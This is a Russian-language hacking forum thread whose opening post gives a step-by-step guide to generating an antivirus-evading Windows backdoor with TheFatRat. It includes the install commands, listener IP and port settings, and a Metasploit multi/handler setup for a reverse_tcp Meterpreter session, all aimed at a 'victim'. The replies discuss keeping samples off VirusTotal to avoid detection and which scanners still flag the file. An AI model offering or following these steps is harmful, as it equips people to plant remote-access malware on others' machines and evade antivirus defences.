Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на https://virustotal.com или http://nodistribute.com как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 
Мне нравится Ваша статья, когда-то читал про FAT-RAT, а в каких условиях вы тестили?
 
  • Нравится
Реакции: Alexs565 и Raj_Hack
так же были пофачены кучи пайлоадов)
 
  • Нравится
Реакции: outlander
НЕ ПРОВЕРЯЙТЕ НА ВИРУСТОТАЛ !!!!!!!!!!!!!!! ВЫ ЧЕГО ТВОРИТЕ, НЕГОДЯИ !!!!!
 
Мде... Virustotal, не надо так...
 
Решил опробовать. попробовал на http://nodistribute.com 2 антивиря определили: IKARUS Security: Trojan.AD.Swrort и Norton Antivirus: Heur.AdvML.B

норм:)
 
Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
 
Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
 
Последнее редактирование модератором:
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.

Cделать раздел закрытым > Этичный хакинг и тестирование на проникновение пускать людей кто в теме у кого прокачены скилы.
 
  • Нравится
Реакции: Vander
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
 
Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
Те кто намеренно делает это одно, а кто по незнанию это другое. А вообще идея diod_ более оптимальна. Я и пояснил это задача Администрации, её решить можно хоть и не на 100% но хотя бы частично.
 
Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
У вас не работает на x64?
 
еще один сканер, не замеченный в сливе антивирусным компаниям https://www.pscan.xyz/
но базы не всегда актуальны
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab